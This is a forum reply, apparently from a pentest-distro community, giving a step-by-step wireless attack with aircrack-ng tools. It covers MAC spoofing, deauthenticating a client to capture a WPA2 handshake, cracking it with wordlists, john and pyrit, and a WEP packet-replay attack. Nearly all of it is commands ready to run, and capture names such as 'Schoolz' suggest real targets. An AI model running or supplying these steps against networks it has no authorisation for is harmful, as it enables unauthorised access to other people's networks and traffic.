Disutopia, good question, the reason it's still channel hopping is because of the general scan of airodump, when you did the "initial target scan" lets say, so, here's what i like to do, btw, i'm using an alfa with the rtl8187 also, nice card, get the 9db antenna for it, really nice

first if you want you can spoof or not spoof mon0:
ifconfig
airmon-ng start wlan0
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 promisc
ifconfig mon0 up
type ifconfig again to double check it
then do yer general all AP scan:
airodump-ng mon0
at this point yer telling yer mon0 to scan ALL
so after you find the target AP, what i like to do
is hit the space bar, this pauses the scan,
copy paste the target AP info onto text file
then i just ctrl+c out i open a new window
and enter this:
airodump-ng --bssid E0:91:XX:XX:XX:7A -c 6 -w Mikeyz mon0
as ya know this starts things off on the correct channel, writes
the file to root,
then the usual from another window:
aireplay-ng -0 6 -a E0:91:XX:XX:XX:7A -c 40:30:XX:XX:XX:40 mon0
load the cap after yer handshake magically appears with no trouble whatsoever
from the universe, aircrack-ng /root/Mikeyz-01.cap
and since you have the password in your dictionary file
again, the universe is awesome like this during wpa2 craggen:
aircrack-ng -w /root/Listz/Custom-WPA /root/Mikeyz-01.cap
and if yer doin wepz:
airodump-ng mon0
locate wep target
airodump-ng --bssid 00:e0:XX:XX:XX:a3 -c 6 -w Schoolz mon0
aireplay-ng -2 -p 0841 -c 88:XX:XX:XX:80:9d -b 00:e0:XX:XX:XX:a3 mon0
aircrack-ng -b 00:e0:XX:XX:XX:a3 /root/Schoolz-01.cap
i like the -p 0841 instead of the usual
also here's incremental craggen:
sudo john --incremental:Digits --stdout:8 | sudo aircrack-ng -e (networkname) -w /root/Listz/Custom-WPA /root/
and
hammeren with pyrit:
pyrit -r /root/Handshake.cap -i /root/Desktop/wordlist.txt attack_passthrough
welcome to backbox, the best pentest distro and community you'll find
i've been around on backtrack, blackbuntu etc and frankly,
only my opinion, backbox, for whatever reason, i don't know how or why
gets the tools right, especially metasploit, so have some fun with yer alfa
